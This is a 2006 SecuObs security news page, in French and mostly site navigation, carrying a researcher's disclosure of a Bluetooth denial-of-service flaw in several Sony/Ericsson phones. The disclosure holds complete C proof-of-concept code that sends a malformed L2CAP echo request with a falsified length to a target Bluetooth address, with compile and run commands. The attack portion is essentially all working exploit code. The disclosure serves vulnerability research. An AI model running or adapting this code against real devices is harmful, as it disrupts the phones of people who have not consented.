Contribuez à SecuObs en envoyant des bitcoins ou des dogecoins.
Nouveaux articles (fr): 1pwnthhW21zdnQ5WucjmnF3pk9puT5fDF
Amélioration du site: 1hckU85orcGCm8A9hk67391LCy4ECGJca

Contribute to SecuObs by sending bitcoins or dogecoins.

Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- microsoft


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Vigilance - NTP.org élévation de privilèges via Cronjob Script, analysé le 22 01 2016
- AFCDP Facebook et sa gestion des données personnelles, toute une histoire
- AFCDP rien ne remplace l'humain en matière de sensibilisation
- La Communauté d'Agglomération Melun Val de Seine choisit SimpliVity
- La résilience nécessite des équipes motivées et bien formées
- Box dévoile Box KeySafe
- Brazilian companies receive more than 40,000 spam emails in infostealer campaign
- AFCDP J'arrête d'être hyperconnecté
- Check Point La plateforme eBay est exposée à une grave vulnérabilité
- Le Camping Interlude Sunêlia choisit la Box Allroad Edition de Wooxo pour une sauvegarde informatique 5 étoiles
- 10 mars de 08h30 à 12h00 - Petit-déjeuner Itrust - Conférence Cybersécurité à Paris
- Nouvelle version de PEA Preuve Echange Archivage
- Vigilance - LibVNCServer cinq vulnérabilités, analysé le 04 12 2015
- Vigilance - OpenSSL déni de service via ServerKeyExchange, analysé le 04 12 2015
- Vodafone désigne Morpho Fournisseur de l'année 2015

Dernier articles de SecuObs :
- DIP, solution de partage d'informations automatisée
- Sqreen, protection applicative intelligente de nouvelle génération
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles

Revue de presse internationale :
- New Angle on Raspberry Pi Zero Hub
- Pirate Group Suspends New Cracks to Measure Impact on Sales
- Links for 2016-02-05 del.icio.us
- A DOS Education in Your Browser
- The Pirate Bay Now Let You Stream Movies and TV, Not Just Download
- Very, Very Low Power Consumption
- Defining an Inside Out Security Policy
- 7728 RTP Stream Pause and Resume
- A Geek s Revenge For Loud Neighbors
- Jackson Memorial Hospital Fires Two Employees For Accessing, Leaking Jason Pierre-Paul s Medical Records To ESPN
- 5 Best Practices for the Perfect Secure Code Review
- Securosis Guide Threat Intelligence Bothan Spies
- Looking for Robust Fraud Prevention Have you asked how your WAF can close the gap
- Magento PCI Compliance Issues and Theft Over TLS
- Check Point Preparing an Unattended Firewall Install with a USB Drive

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- Mises à jour en perspective pour le système Vigik
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- WPA Cracker un cluster en ligne de 400 CPU et un dictionnaire de 135 millions d'entrées pour casser, ou pas, WPA/WPA2-PSK en 20 minutes
- [IDS Snort Windows – Partie 2] Installation et configuration
- [Infratech - release] version 0.6 de Bluetooth Stack Smasher
- [Ettercap – Partie 3] Ettercap par l'exemple - Affaiblissement de protocoles et attaque par injection
- IronWASP une plate-forme d'audit Web résolument modulaire
- Sqreen, protection applicative intelligente de nouvelle génération
- Les russes ont-ils pwn le système AEGIS ?
- Le support du protocole IEC-104 ajouté à NetworkMinner 1.04 pour le Forensic SCADA

Top bi-hebdo de la revue de presse
- Nevis encryption-detection software updated to version 1.5.0
- PIN vs frida vs DynamoRIO for binary only vulnerability discovery
- Les français, mauvais élèves en matière de protection de leurs données personnelles
- mdaemon_worldclient_form2raw.rb.txt
- Fêtes de fin d'année Acronis délivre ses 6 conseils pour protéger vos photos et vidéos souvenirs
- L'UE renforce la protection des données personnelles
- Startups from Europe, Israel and South Africa selected for Cyber London accelerator programme
- New Word malware Bestellung
- Emokit Hacking the Emotiv EPOC Brain-Computer Interface
- Wooxo et Nextep signent un accord de partenariat pour la distribution de solutions de protection des données informatiques

Top bi-hebdo de l'annuaire des videos
- OWASP Top 10 2 Cross Site Scripting XSS How to prevent attack
- Apple TV 2 FIX SSH exchange identification Connection closed by remote host REMOVE FIX IKEE Virus
- Comment Pirater Un Ordinateur Avec Ubuntu Metasploit
- Comment creer un server botnet!!!!(Réseau de pc zombies)
- Tutoriel Supprimer Cacaoweb Botnet
- SONY VAIO VGN UX280P Biometric Security
- kali linux Collecte d adresses Email avec Metasploit
- install zeus botnet
- Bbkeyswin WPA d une Bbox en 2 min sous Windows
- kali linux metasploit 4 6 db autopwn

Top bi-hebdo de la revue Twitter
- RT @mikko Incredible. Turns out the t․co outage 24h ago happened b/c somebody reported it as a phishing site.
- @HardRom SQL Injections are typically due to a vulnerability in software that is exploited. The author needs to ensure safe code practices.
- Swatting phreaker swatted and heading to jail: A 19-year-old American has been sentenced to eleven years in pris..
- Video: Linux Native Multitouch Support
- 30,000 WordPress blogs infected to distribute rogue antivirus software - - Via @cio_australia
- @rosstav @tonyrobbins the blackhat seo type of spam... Let us know if you need any help.
- @GphreakX Interesting, shoot me an email (paul /at/ nessus.org), I want to hear more and help
- Phrack 66 publié !
- @trey_brown There was a old phone phreak conf that used to announce the number of people on the line. That was nice.
- RT @secureideas: I believe that all the XSS flaws announced are fixed in CVS. Will test again tomorrow if so, release 1.4.3. #BASESnort

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

Failles

English version with Google Translate

[Infratech - vulnérabilité] PoC pour le DoS sur les téléphones portables Sony/Ericsson

Par Pierre Betouin, secuobs.com
Le 05/02/2006


Résumé : Le code PoC (Proof of Concept) permettant de réaliser le DoS (Déni de Service) sur les téléphones mobiles de la marque Sony/Ericsson. Sa compilation nécessite la librairie libbluetooth. - Lire l'article



PoC code could be also downloaded on lien - compilation needs libbluetooth.


/* Sony/Ericsson reset display - PoC */
/* Pierre Betouin - pierre.betouin@infratech.fr */
/* 05-02-2006 */
/* Vulnerability found using BSS fuzzer : */
/* Download www.secuobs.com/news/05022006-bluetooth10.shml */
/* */
/* Causes anormal behaviours on some Sony/Ericsson */
/* cell phones */
/* Vulnerable tested devices : */
/* - K600i */
/* - V600i */
/* - K750i */
/* - W800i */
/* - And maybe other ones... */
/* */
/* Vulnerable devices will slowly turn their screen into */
/* black and then display a white screen. */
/* After a short period (~45sec), they will go back to */
/* their normal behaviour */
/* */
/* gcc -lbluetooth reset_display_sonyericsson.c */
/* -o reset_display_sonyericsson */
/* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/l2cap.h>

#define SIZE 4
#define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header)

int main(int argc, char **argv)
{
char *buffer;
l2cap_cmd_hdr *cmd;
struct sockaddr_l2 addr;
int sock, sent, i;

if(argc < 2)
{
fprintf(stderr, "%s <btaddr>\n", argv[0]);
exit(EXIT_FAILURE);
}

if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0)
{
perror("socket");
exit(EXIT_FAILURE);
}

memset(&addr, 0, sizeof(addr));
addr.l2_family = AF_BLUETOOTH;

if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("bind");
exit(EXIT_FAILURE);
}

str2ba(argv[1], &addr.l2_bdaddr);

if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("connect");
exit(EXIT_FAILURE);
}

if(!(buffer = (char *) malloc ((int) SIZE + 1)))
{
perror("malloc");
exit(EXIT_FAILURE);
}

memset(buffer, 90, SIZE);

cmd = (l2cap_cmd_hdr *) buffer;
cmd->code = L2CAP_ECHO_REQ;
cmd->ident = 1;
cmd->len = FAKE_SIZE;

if( (sent=send(sock, buffer, SIZE, 0)) >= 0)
{
printf("L2CAP packet sent (%d)\n", sent);
}

printf("Buffer:\t");
for(i=0; i<sent; i++)
printf("%.2X ", (unsigned char) buffer[i]);
printf("\n");

free(buffer);
close(sock);
return EXIT_SUCCESS;
}



Ce code peut être également téléchargé sur lien - la compilation a besoin de la libbluetooth

Autres ressources sur la sécurité Bluetooth :

[Dossier Sécurité Bluetooth - partie 1] Introduction aux technologies Bluetooth lien

[Dossier Sécurité Bluetooth - partie 2] Présentation des utilitaies Bluetooth lien

[Dossier Sécurité Bluetooth - partie 3] Les attaques génériques lien

[Dossier Sécurité Bluetooth - partie 4] Les attaques d'implémentations lien

[Dossier Sécurité Bluetooth - partie 5] Scénarios possibles & synthèse lien

[Infratech - vulnérabilité] Déni de Service sur les téléphones mobiles Sony/Ericsson lien

[Infratech - vulnérabilité] PoC pour le DoS sur hcidump lien

[Infratech - vulnérabilité] Déni de Service sur hcidump lien

[Infratech - release] BSS - Bluetooth Stack Smasher v0.6 lien



- Article suivant : [Infratech - vulnérabilité] PoC pour le DoS sur hcidump
- Article précédent : [Infratech - vulnérabilité] Déni de Service sur les téléphones mobiles Sony/Ericsson
- Article suivant dans la catégorie Failles : [Infratech - vulnérabilité] PoC pour le DoS sur hcidump
- Article précédent dans la catégorie Failles : [Infratech - vulnérabilité] Déni de Service sur les téléphones mobiles Sony/Ericsson


Les derniers commentaires de la catégorie Failles:
- ESRT @sambowne - Russian firm Elcomsoft unveils tool to crack BlackBerry encryption security ...
- SPIP recently fixed 2 vulnerabilities notified by Tehtri-Security 0day ...
- PuttyHijack session hijack POC ...
- ESRT @thierryzoller - Updated BEAST blog post with Proof of Concept code and the whitepaper ...
- ESRT @y0ug @Securelist - New article published: MYBIOS Is BIOS infection a reality ...

Les derniers articles de la catégorie Failles :
- Les russes ont-ils pwn le système AEGIS ?
- Backdoors BMC éventuelles via une faille IPMI sur au moins 100 000 serveurs publics
- Jekyll, une application malicieuse contournant les détections de l App Store d Apple
- La vulnérabilité cryptographique d Android, l origine du vol de 5 720 dollars en bitcoins
- Une faille critique de Firefox expose les utilisateurs de Tor Browser Bundle
- Une porte dérobée présente depuis 9 mois dans OpenX
- De mauvaises implémentations d UEFI permettent de contourner Secure Boot
- Prendre le contrôle d une voiture avec une manette de jeu, c est possible
- Une nouvelle vulnérabilité critique aurait été découverte dans Java 7
- Les problèmes de sécurité des cartes SIM peuvent être facilement corrigés




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :